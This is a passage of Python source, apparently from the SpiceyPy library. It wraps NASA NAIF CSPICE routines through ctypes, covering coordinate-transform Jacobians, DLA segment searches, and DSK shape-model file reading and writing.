idwlen = ctypes.c_int(lenout) # intentional
ifnlen = ctypes.c_int(lenout) # intentional
idword = stypes.stringToCharP(lenout)
ifname = stypes.stringToCharP(lenout)
nresvr = ctypes.c_int(0)
nresvc = ctypes.c_int(0)
ncomr = ctypes.c_int(0)
ncomc = ctypes.c_int(0)
libspice.dasrfr_c(handle, idwlen, ifnlen, idword, ifname,
ctypes.byref(nresvr), ctypes.byref(nresvc),
ctypes.byref(ncomr), ctypes.byref(ncomc))
return stypes.toPythonString(idword), stypes.toPythonString(ifname), nresvr.value, nresvc.value, ncomr.value, ncomc.value
@spiceErrorCheck
def dcyldr(x, y, z):
"""
This routine computes the Jacobian of the transformation from
rectangular to cylindrical coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dcyldr_c.html
:param x: X-coordinate of point.
:type x: float
:param y: Y-coordinate of point.
:type y: float
:param z: Z-coordinate of point.
:type z: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
x = ctypes.c_double(x)
y = ctypes.c_double(y)
z = ctypes.c_double(z)
jacobi = stypes.emptyDoubleMatrix()
libspice.dcyldr_c(x, y, z, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def deltet(epoch, eptype):
"""
Return the value of Delta ET (ET-UTC) for an input epoch.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/deltet_c.html
:param epoch: Input epoch (seconds past J2000).
:type epoch: float
:param eptype: Type of input epoch ("UTC" or "ET").
:type eptype: str
:return: Delta ET (ET-UTC) at input epoch.
:rtype: float
"""
epoch = ctypes.c_double(epoch)
eptype = stypes.stringToCharP(eptype)
delta = ctypes.c_double()
libspice.deltet_c(epoch, eptype, ctypes.byref(delta))
return delta.value
@spiceErrorCheck
def det(m1):
"""
Compute the determinant of a double precision 3x3 matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/det_c.html
:param m1: Matrix whose determinant is to be found.
:type m1: 3x3-Element Array of floats
:return: The determinant of the matrix.
:rtype: float
"""
m1 = stypes.toDoubleMatrix(m1)
return libspice.det_c(m1)
@spiceErrorCheck
def dgeodr(x, y, z, re, f):
"""
This routine computes the Jacobian of the transformation from
rectangular to geodetic coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dgeodr_c.html
:param x: X-coordinate of point.
:type x: float
:param y: Y-coordinate of point.
:type y: float
:param z: Z-coord
:type z: float
:param re: Equatorial radius of the reference spheroid.
:type re: float
:param f: Flattening coefficient.
:type f: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
x = ctypes.c_double(x)
y = ctypes.c_double(y)
z = ctypes.c_double(z)
re = ctypes.c_double(re)
f = ctypes.c_double(f)
jacobi = stypes.emptyDoubleMatrix()
libspice.dgeodr_c(x, y, z, re, f, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def diags2(symmat):
"""
Diagonalize a symmetric 2x2 matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/diags2_c.html
:param symmat: A symmetric 2x2 matrix.
:type symmat: 2x2-Element Array of floats
:return:
A diagonal matrix similar to symmat,
A rotation used as the similarity transformation.
:rtype: tuple
"""
symmat = stypes.toDoubleMatrix(symmat)
diag = stypes.emptyDoubleMatrix(x=2, y=2)
rotateout = stypes.emptyDoubleMatrix(x=2, y=2)
libspice.diags2_c(symmat, diag, rotateout)
return stypes.cMatrixToNumpy(diag), stypes.cMatrixToNumpy(rotateout)
@spiceErrorCheck
def diff(a, b):
"""
Take the difference of two sets of any data type to form a third set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/diff_c.html
:param a: First input set.
:type a: spiceypy.utils.support_types.SpiceCell
:param b: Second input set.
:type b: spiceypy.utils.support_types.SpiceCell
:return: Difference of a and b.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(a, stypes.SpiceCell)
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == b.dtype
# The next line was redundant with the [raise NotImplementedError] line below
# assert a.dtype == 0 or a.dtype == 1 or a.dtype == 2
if a.dtype is 0:
c = stypes.SPICECHAR_CELL(max(a.size, b.size), max(a.length, b.length))
elif a.dtype is 1:
c = stypes.SPICEDOUBLE_CELL(max(a.size, b.size))
elif a.dtype is 2:
c = stypes.SPICEINT_CELL(max(a.size, b.size))
else:
raise NotImplementedError
libspice.diff_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
return c
@spiceErrorCheck
@spiceFoundExceptionThrower
def dlabbs(handle):
"""
Begin a backward segment search in a DLA file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlabbs_c.html
:param handle: Handle of open DLA file.
:type handle: int
:return: Descriptor of last segment in DLA file
:rtype: spiceypy.utils.support_types.SpiceDLADescr
"""
handle = ctypes.c_int(handle)
descr = stypes.SpiceDLADescr()
found = ctypes.c_int()
libspice.dlabbs_c(handle, ctypes.byref(descr), ctypes.byref(found))
return descr, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dlabfs(handle):
"""
Begin a forward segment search in a DLA file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlabfs_c.html
:param handle: Handle of open DLA file.
:type handle: int
:return: Descriptor of next segment in DLA file
:rtype: spiceypy.utils.support_types.SpiceDLADescr
"""
handle = ctypes.c_int(handle)
descr = stypes.SpiceDLADescr()
found = ctypes.c_int()
libspice.dlabfs_c(handle, ctypes.byref(descr), ctypes.byref(found))
return descr, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dlafns(handle, descr):
"""
Find the segment following a specified segment in a DLA file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlafns_c.html
:param handle: Handle of open DLA file.
:type handle: c_int
:param descr: Descriptor of a DLA segment.
:type descr: spiceypy.utils.support_types.SpiceDLADescr
:return: Descriptor of next segment in DLA file
:rtype: spiceypy.utils.support_types.SpiceDLADescr
"""
assert isinstance(descr, stypes.SpiceDLADescr)
handle = ctypes.c_int(handle)
nxtdsc = stypes.SpiceDLADescr()
found = ctypes.c_int()
libspice.dlafns_c(handle, ctypes.byref(descr), ctypes.byref(nxtdsc), ctypes.byref(found))
return nxtdsc, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dlafps(handle, descr):
"""
Find the segment preceding a specified segment in a DLA file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlafps_c.html
:param handle: Handle of open DLA file.
:type handle: c_int
:param descr: Descriptor of a segment in DLA file.
:type descr: spiceypy.utils.support_types.SpiceDLADescr
:return: Descriptor of previous segment in DLA file
:rtype: spiceypy.utils.support_types.SpiceDLADescr
"""
assert isinstance(descr, stypes.SpiceDLADescr)
handle = ctypes.c_int(handle)
prvdsc = stypes.SpiceDLADescr()
found = ctypes.c_int()
libspice.dlafps_c(handle, ctypes.byref(descr), ctypes.byref(prvdsc),
ctypes.byref(found))
return prvdsc, bool(found.value)
@spiceErrorCheck
def dlatdr(x, y, z):
"""
This routine computes the Jacobian of the transformation from
rectangular to latitudinal coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dlatdr_c.html
:param x: X-coordinate of point.
:type x: float
:param y: Y-coordinate of point.
:type y: float
:param z: Z-coord
:type z: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
x = ctypes.c_double(x)
y = ctypes.c_double(y)
z = ctypes.c_double(z)
jacobi = stypes.emptyDoubleMatrix()
libspice.dlatdr_c(x, y, z, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def dp2hx(number, lenout=_default_len_out):
"""
Convert a double precision number to an equivalent character
string using base 16 "scientific notation."
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dp2hx_c.html
:param number: D.p. number to be converted.
:type number: float
:param lenout: Available space for output string.
:type lenout: int
:return: Equivalent character string, left justified.
:rtype: str
"""
number = ctypes.c_double(number)
lenout = ctypes.c_int(lenout)
string = stypes.stringToCharP(lenout)
length = ctypes.c_int()
libspice.dp2hx_c(number, lenout, string, ctypes.byref(length))
return stypes.toPythonString(string)
@spiceErrorCheck
def dpgrdr(body, x, y, z, re, f):
"""
This routine computes the Jacobian matrix of the transformation
from rectangular to planetographic coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dpgrdr_c.html
:param body: Body with which coordinate system is associated.
:type body: str
:param x: X-coordinate of point.
:type x: float
:param y: Y-coordinate of point.
:type y: float
:param z: Z-coordinate of point.
:type z: float
:param re: Equatorial radius of the reference spheroid.
:type re: float
:param f: Flattening coefficient.
:type f: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
body = stypes.stringToCharP(body)
x = ctypes.c_double(x)
y = ctypes.c_double(y)
z = ctypes.c_double(z)
re = ctypes.c_double(re)
f = ctypes.c_double(f)
jacobi = stypes.emptyDoubleMatrix()
libspice.dpgrdr_c(body, x, y, z, re, f, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def dpmax():
"""
Return the value of the largest (positive) number representable
in a double precision variable.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dpmax_c.html
:return:
The largest (positive) number representable
in a double precision variable.
:rtype: float
"""
return libspice.dpmax_c()
@spiceErrorCheck
def dpmin():
"""
Return the value of the smallest (negative) number representable
in a double precision variable.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dpmin_c.html
:return:
The smallest (negative) number that can be represented
in a double precision variable.
:rtype: float
"""
return libspice.dpmin_c()
@spiceErrorCheck
def dpr():
"""
Return the number of degrees per radian.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dpr_c.html
:return: The number of degrees per radian.
:rtype: float
"""
return libspice.dpr_c()
@spiceErrorCheck
def drdcyl(r, lon, z):
"""
This routine computes the Jacobian of the transformation from
cylindrical to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdcyl_c.html
:param r: Distance of a point from the origin.
:type r: float
:param lon: Angle of the point from the xz plane in radians.
:type lon: float
:param z: Height of the point above the xy plane.
:type z: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
r = ctypes.c_double(r)
lon = ctypes.c_double(lon)
z = ctypes.c_double(z)
jacobi = stypes.emptyDoubleMatrix()
libspice.drdcyl_c(r, lon, z, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def drdgeo(lon, lat, alt, re, f):
"""
This routine computes the Jacobian of the transformation from
geodetic to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdgeo_c.html
:param lon: Geodetic longitude of point (radians).
:type lon: float
:param lat: Geodetic latitude of point (radians).
:type lat: float
:param alt: Altitude of point above the reference spheroid.
:type alt: float
:param re: Equatorial radius of the reference spheroid.
:type re: float
:param f: Flattening coefficient.
:type f: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
lon = ctypes.c_double(lon)
lat = ctypes.c_double(lat)
alt = ctypes.c_double(alt)
re = ctypes.c_double(re)
f = ctypes.c_double(f)
jacobi = stypes.emptyDoubleMatrix()
libspice.drdgeo_c(lon, lat, alt, re, f, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def drdlat(r, lon, lat):
"""
Compute the Jacobian of the transformation from latitudinal to
rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdlat_c.html
:param r: Distance of a point from the origin.
:type r: float
:param lon: Angle of the point from the XZ plane in radians.
:type lon: float
:param lat: Angle of the point from the XY plane in radians.
:type lat: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
r = ctypes.c_double(r)
lon = ctypes.c_double(lon)
lat = ctypes.c_double(lat)
jacobi = stypes.emptyDoubleMatrix()
libspice.drdlat_c(r, lon, lat, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def drdpgr(body, lon, lat, alt, re, f):
"""
This routine computes the Jacobian matrix of the transformation
from planetographic to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdpgr_c.html
:param body: Body with which coordinate system is associated.
:type body: str
:param lon: Planetographic longitude of a point (radians).
:type lon: float
:param lat: Planetographic latitude of a point (radians).
:type lat: float
:param alt: Altitude of a point above reference spheroid.
:type alt: float
:param re: Equatorial radius of the reference spheroid.
:type re: float
:param f: Flattening coefficient.
:type f: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
body = stypes.stringToCharP(body)
lon = ctypes.c_double(lon)
lat = ctypes.c_double(lat)
alt = ctypes.c_double(alt)
re = ctypes.c_double(re)
f = ctypes.c_double(f)
jacobi = stypes.emptyDoubleMatrix()
libspice.drdpgr_c(body, lon, lat, alt, re, f, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def drdsph(r, colat, lon):
"""
This routine computes the Jacobian of the transformation from
spherical to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/drdsph_c.html
:param r: Distance of a point from the origin.
:type r: float
:param colat: Angle of the point from the positive z-axis.
:type colat: float
:param lon: Angle of the point from the xy plane.
:type lon: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
r = ctypes.c_double(r)
colat = ctypes.c_double(colat)
lon = ctypes.c_double(lon)
jacobi = stypes.emptyDoubleMatrix()
libspice.drdsph_c(r, colat, lon, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
def dskb02(handle, dladsc):
"""
Return bookkeeping data from a DSK type 2 segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskb02_c.html
:param handle: DSK file handle
:type handle: int
:param dladsc: DLA descriptor
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:return: bookkeeping data from a DSK type 2 segment
:rtype: tuple
"""
handle = ctypes.c_int(handle)
nv = ctypes.c_int(0)
np = ctypes.c_int(0)
nvxtot = ctypes.c_int(0)
vtxbds = stypes.emptyDoubleMatrix(3, 2)
voxsiz = ctypes.c_double(0.0)
voxori = stypes.emptyDoubleVector(3)
vgrext = stypes.emptyIntVector(3)
cgscal = ctypes.c_int(0)
vtxnpl = ctypes.c_int(0)
voxnpt = ctypes.c_int(0)
voxnpl = ctypes.c_int(0)
libspice.dskb02_c(handle, dladsc, ctypes.byref(nv), ctypes.byref(np), ctypes.byref(nvxtot), vtxbds, ctypes.byref(voxsiz), voxori, vgrext, ctypes.byref(cgscal), ctypes.byref(vtxnpl), ctypes.byref(voxnpt), ctypes.byref(voxnpl))
return nv.value, np.value, nvxtot.value, stypes.cMatrixToNumpy(vtxbds), voxsiz.value, stypes.cVectorToPython(voxori), stypes.cVectorToPython(vgrext), cgscal.value, vtxnpl.value, voxnpt.value, voxnpl.value
@spiceErrorCheck
def dskcls(handle, optmiz=False):
"""
Close a DSK file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskcls_c.html
:param handle: Handle assigned to the opened DSK file.
:type handle: int
:param optmiz: Flag indicating whether to segregate the DSK.
:type optmiz: bool
:return:
"""
handle = ctypes.c_int(handle)
optmiz = ctypes.c_int(optmiz)
libspice.dskcls_c(handle, optmiz)
@spiceErrorCheck
def dskd02(handle,dladsc,item,start,room):
"""
Fetch double precision data from a type 2 DSK segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskd02_c.html
:param handle: DSK file handle
:type handle: int
:param dladsc: DLA descriptor
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:param item: Keyword identifying item to fetch
:type item: int
:param start: Start index
:type start: int
:param room: Amount of room in output array
:type room: int
:return: Array containing requested item
:rtype: numpy.ndarray
"""
handle = ctypes.c_int(handle)
item = ctypes.c_int(item)
start = ctypes.c_int(start)
room = ctypes.c_int(room)
n = ctypes.c_int(0)
values = stypes.emptyDoubleVector(room)
libspice.dskd02_c(handle, dladsc, item, start, room, ctypes.byref(n), values)
return stypes.cVectorToPython(values)
@spiceErrorCheck
def dskgd(handle, dladsc):
"""
Return the DSK descriptor from a DSK segment identified
by a DAS handle and DLA descriptor.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskgd_c.html
:param handle: Handle assigned to the opened DSK file.
:type handle: int
:param dladsc: DLA segment descriptor.
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:return: DSK segment descriptor.
:rtype: stypes.SpiceDSKDescr
"""
handle = ctypes.c_int(handle)
dskdsc = stypes.SpiceDSKDescr()
libspice.dskgd_c(handle, ctypes.byref(dladsc), ctypes.byref(dskdsc))
return dskdsc
@spiceErrorCheck
def dskgtl(keywrd):
"""
Retrieve the value of a specified DSK tolerance or margin parameter.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskgtl_c.html
:param keywrd: Code specifying parameter to retrieve.
:type keywrd: int
:return: Value of parameter.
:rtype: float
"""
keywrd = ctypes.c_int(keywrd)
dpval = ctypes.c_double(0)
libspice.dskgtl_c(keywrd, ctypes.byref(dpval))
return dpval.value
@spiceErrorCheck
def dski02(handle, dladsc, item, start, room):
"""
Fetch integer data from a type 2 DSK segment.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dski02_c.html
:param handle: DSK file handle.
:type handle: int
:param dladsc: DLA descriptor.
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:param item: Keyword identifying item to fetch.
:type item: int
:param start: Start index.
:type start: int
:param room: Amount of room in output array.
:type room: int
:return: Array containing requested item.
:rtype: array
"""
handle = ctypes.c_int(handle)
item = ctypes.c_int(item)
start = ctypes.c_int(start)
room = ctypes.c_int(room)
n = ctypes.c_int()
values = stypes.emptyIntVector(room)
libspice.dski02_c(handle, dladsc, item, start, room, ctypes.byref(n), values)
return stypes.cMatrixToNumpy(values)
@spiceErrorCheck
def dskmi2(vrtces, plates, finscl, corscl, worksz, voxpsz, voxlsz, makvtl, spxisz):
"""
Make spatial index for a DSK type 2 segment. The index is returned
as a pair of arrays, one of type int and one of type
float. These arrays are suitable for use with the DSK type 2
writer dskw02.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskmi2_c.html
:param vrtces: Vertices
:type vrtces: NxM-Element Array of floats
:param plates: Plates
:type plates: NxM-Element Array of ints
:param finscl: Fine voxel scale
:type finscl: float
:param corscl: Coarse voxel scale
:type corscl: int
:param worksz: Workspace size
:type worksz: int
:param voxpsz: Voxel plate pointer array size
:type voxpsz: int
:param voxlsz: Voxel plate list array size
:type voxlsz: int
:param makvtl: Vertex plate list flag
:type makvtl: bool
:param spxisz: Spatial index integer component size
:type spxisz: int
:return: double precision and integer components of the spatial index of the segment.
:rtype: tuple
"""
nv = ctypes.c_int(len(vrtces))
vrtces = stypes.toDoubleMatrix(vrtces)
np = ctypes.c_int(len(plates))
plates = stypes.toIntMatrix(plates)
finscl = ctypes.c_double(finscl)
corscl = ctypes.c_int(corscl)
worksz = ctypes.c_int(worksz)
voxpsz = ctypes.c_int(voxpsz)
voxlsz = ctypes.c_int(voxlsz)
makvtl = ctypes.c_int(makvtl)
spxisz = ctypes.c_int(spxisz)
work = stypes.emptyIntMatrix(2, worksz)
spaixd = stypes.emptyDoubleVector(10) # SPICE_DSK02_SPADSZ
spaixi = stypes.emptyIntVector(spxisz)
libspice.dskmi2_c(nv, vrtces, np, plates, finscl, corscl, worksz, voxpsz, voxlsz, makvtl, spxisz, work, spaixd, spaixi)
return stypes.cVectorToPython(spaixd), stypes.cVectorToPython(spaixi)
@spiceErrorCheck
def dskn02(handle, dladsc, plid):
"""
Compute the unit normal vector for a specified plate from a type
2 DSK segment.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskn02_c.html
:param handle: DSK file handle.
:type handle: int
:param dladsc: DLA descriptor.
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:param plid: Plate ID.
:type plid: int
:return: late's unit normal vector.
:rtype: 3-Element Array of floats.
"""
handle = ctypes.c_int(handle)
plid = ctypes.c_int(plid)
normal = stypes.emptyDoubleVector(3)
libspice.dskn02_c(handle, dladsc, plid, normal)
return stypes.cVectorToPython(normal)
@spiceErrorCheck
def dskobj(dsk):
"""
Find the set of body ID codes of all objects for which
topographic data are provided in a specified DSK file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskobj_c.html
:param dsk: Name of DSK file.
:type dsk: str
:return: Set of ID codes of objects in DSK file.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
dsk = stypes.stringToCharP(dsk)
bodids = stypes.SPICEINT_CELL(10000)
libspice.dskobj_c(dsk, ctypes.byref(bodids))
return bodids
@spiceErrorCheck
def dskopn(fname, ifname, ncomch):
"""
Open a new DSK file for subsequent write operations.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskopn_c.html
:param fname: Name of a DSK file to be opened.
:type fname: str
:param ifname: Internal file name.
:type ifname: str
:param ncomch: Number of comment characters to allocate.
:type ncomch: int
:return: Handle assigned to the opened DSK file.
:rtype: int
"""
fname = stypes.stringToCharP(fname)
ifname = stypes.stringToCharP(ifname)
ncomch = ctypes.c_int(ncomch)
handle = ctypes.c_int()
libspice.dskopn_c(fname, ifname, ncomch, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def dskp02(handle, dladsc, start, room):
"""
Fetch triangular plates from a type 2 DSK segment.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskp02_c.html
:param handle: DSK file handle.
:type handle: int
:param dladsc: DLA descriptor.
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:param start: Start index.
:type start: int
:param room: Amount of room in output array.
:type room: int
:return: Array containing plates.
"""
handle = ctypes.c_int(handle)
start = ctypes.c_int(start)
room = ctypes.c_int(room)
n = ctypes.c_int(0)
plates = stypes.emptyIntMatrix(3, room)
libspice.dskp02_c(handle, dladsc, start, room, ctypes.byref(n), plates)
return stypes.cMatrixToNumpy(plates)
@spiceErrorCheck
def dskrb2(vrtces, plates, corsys, corpar):
"""
Determine range bounds for a set of triangular plates to
be stored in a type 2 DSK segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskrb2_c.html
:param vrtces: Vertices
:type vrtces: NxM-Element Array of floats
:param plates: Plates
:type plates: NxM-Element Array of ints
:param corsys: DSK coordinate system code
:type corsys: int
:param corpar: DSK coordinate system parameters
:type corpar: N-Element Array of floats
:return: Lower and Upper bound on range of third coordinate
:rtype: tuple
"""
nv = ctypes.c_int(len(vrtces))
vrtces = stypes.toDoubleMatrix(vrtces)
np = ctypes.c_int(len(plates))
plates = stypes.toIntMatrix(plates)
corsys = ctypes.c_int(corsys)
corpar = stypes.toDoubleVector(corpar)
mncor3 = ctypes.c_double(0.0)
mxcor3 = ctypes.c_double(0.0)
libspice.dskrb2_c(nv, vrtces, np, plates, corsys, corpar, ctypes.byref(mncor3), ctypes.byref(mxcor3))
return mncor3.value, mxcor3.value
@spiceErrorCheck
def dsksrf(dsk, bodyid):
"""
Find the set of surface ID codes for all surfaces associated with
a given body in a specified DSK file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dsksrf_c.html
:param dsk: Name of DSK file.
:type dsk: str
:param bodyid: Integer body ID code.
:type bodyid: int
:return: Set of ID codes of surfaces in DSK file.
"""
dsk = stypes.stringToCharP(dsk)
bodyid = ctypes.c_int(bodyid)
srfids = stypes.SPICEINT_CELL(10000)
libspice.dsksrf_c(dsk, bodyid, ctypes.byref(srfids))
return srfids
@spiceErrorCheck
def dskstl(keywrd, dpval):
"""
Set the value of a specified DSK tolerance or margin parameter.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskstl_c.html
:param keywrd: Code specifying parameter to set.
:type keywrd: int
:param dpval: Value of parameter.
:type dpval: float
:return:
"""
keywrd = ctypes.c_int(keywrd)
dpval = ctypes.c_double(dpval)
libspice.dskstl_c(keywrd, dpval)
@spiceErrorCheck
def dskv02(handle, dladsc, start, room):
"""
Fetch vertices from a type 2 DSK segment.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskv02_c.html
:param handle: DSK file handle.
:type handle: int
:param dladsc: DLA descriptor.
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:param start: Start index.
:type start: int
:param room: Amount of room in output array.
:type room: int
:return: Array containing vertices.
:rtype: Room x 3-Element Array of floats
"""
handle = ctypes.c_int(handle)
start = ctypes.c_int(start)
room = ctypes.c_int(room)
n = ctypes.c_int()
vrtces = stypes.emptyDoubleMatrix(3, room)
libspice.dskv02_c(handle, dladsc, start, room, ctypes.byref(n), vrtces)
return stypes.cMatrixToNumpy(vrtces)
@spiceErrorCheck
def dskw02(handle, center, surfid, dclass, fname, corsys, corpar, mncor1,
mxcor1, mncor2, mxcor2, mncor3, mxcor3, first, last, vrtces,
plates, spaixd, spaixi):
"""
Write a type 2 segment to a DSK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskw02_c.html
:param handle: Handle assigned to the opened DSK file
:type handle: int
:param center: Central body ID code
:type center: int
:param surfid: Surface ID code
:type surfid: int
:param dclass: Data class
:type dclass: int
:param fname: Reference frame
:type fname: str
:param corsys: Coordinate system code
:type corsys: int
:param corpar: Coordinate system parameters
:type corpar: N-Element Array of floats
:param mncor1: Minimum value of first coordinate
:type mncor1: float
:param mxcor1: Maximum value of first coordinate
:type mxcor1: float
:param mncor2: Minimum value of second coordinate
:type mncor2: float
:param mxcor2: Maximum value of second coordinate
:type mxcor2: float
:param mncor3: Minimum value of third coordinate
:type mncor3: float
:param mxcor3: Maximum value of third coordinate
:type mxcor3: float
:param first: Coverage start time
:type first: float
:param last: Coverage stop time
:type last: float
:param vrtces: Vertices
:type vrtces: NxM-Element Array of floats
:param plates: Plates
:type plates: NxM-Element Array of ints
:param spaixd: Double precision component of spatial index
:type spaixd: N-Element Array of floats
:param spaixi: Integer component of spatial index
:type spaixi: N-Element Array of ints
"""
handle = ctypes.c_int(handle)
center = ctypes.c_int(center)
surfid = ctypes.c_int(surfid)
dclass = ctypes.c_int(dclass)
fname = stypes.stringToCharP(fname)
corsys = ctypes.c_int(corsys)
corpar = stypes.toDoubleVector(corpar)
mncor1 = ctypes.c_double(mncor1)
mxcor1 = ctypes.c_double(mxcor1)
mncor2 = ctypes.c_double(mncor2)
mxcor2 = ctypes.c_double(mxcor2)
mncor3 = ctypes.c_double(mncor3)
mxcor3 = ctypes.c_double(mxcor3)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
nv = ctypes.c_int(len(vrtces))
vrtces = stypes.toDoubleMatrix(vrtces)
np = ctypes.c_int(len(plates))
plates = stypes.toIntMatrix(plates)
spaixd = stypes.toDoubleVector(spaixd)
spaixi = stypes.toIntVector(spaixi)
libspice.dskw02_c(handle, center, surfid, dclass, fname, corsys, corpar,
mncor1, mxcor1, mncor2, mxcor2, mncor3, mxcor3, first,
last, nv, vrtces, np, plates, spaixd, spaixi)
@spiceErrorCheck
def dskx02(handle, dladsc, vertex, raydir):
"""
Determine the plate ID and body-fixed coordinates of the
intersection of a specified ray with the surface defined by a
type 2 DSK plate model.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskx02_c.html
:param handle: Handle of DSK kernel containing plate model.
:type handle: int
:param dladsc: DLA descriptor of plate model segment.
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:param vertex: Ray's vertex in the body fixed frame.
:type vertex: 3-Element Array of floats
:param raydir: Ray direction in the body fixed frame.
:type raydir: 3-Element Array of floats
:return: ID code of the plate intersected by the ray, Intercept, and Flag indicating whether intercept exists.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
vertex = stypes.toDoubleVector(vertex)
raydir = stypes.toDoubleVector(raydir)
plid = ctypes.c_int()
xpt = stypes.emptyDoubleVector(3)
found = ctypes.c_int()
libspice.dskx02_c(handle, ctypes.byref(dladsc), vertex, raydir, ctypes.byref(plid), xpt, ctypes.byref(found))
return plid.value, stypes.cVectorToPython(xpt), bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dskxsi(pri, target, srflst, et, fixref, vertex, raydir):
"""
Compute a ray-surface intercept using data provided by
multiple loaded DSK segments. Return information about
the source of the data defining the surface on which the
intercept was found: DSK handle, DLA and DSK descriptors,
and DSK data type-dependent parameters.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskxsi_c.html
:param pri: Data prioritization flag.
:type pri: bool
:param target: Target body name.
:type target: str
:param srflst: Surface ID list.
:type srflst: list of int
:param et: Epoch, expressed as seconds past J2000 TDB.
:type et: float
:param fixref: Name of target body-fixed reference frame.
:type fixref: str
:param vertex: Vertex of ray.
:type vertex: 3-Element Array of floats
:param raydir: Direction vector of ray.
:type raydir: 3-Element Array of floats
:return: Intercept point, Handle of segment contributing surface data, DLADSC, DSKDSC, Double precision component of source info, Integer component of source info
:rtype: tuple
"""
pri = ctypes.c_int(pri)
target = stypes.stringToCharP(target)
nsurf = ctypes.c_int(len(srflst))
srflst = stypes.toIntVector(srflst)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
vertex = stypes.toDoubleVector(vertex)
raydir = stypes.toDoubleVector(raydir)
maxd = ctypes.c_int(1)
maxi = ctypes.c_int(1)
xpt = stypes.emptyDoubleVector(3)
handle = ctypes.c_int(0)
dladsc = stypes.SpiceDLADescr()
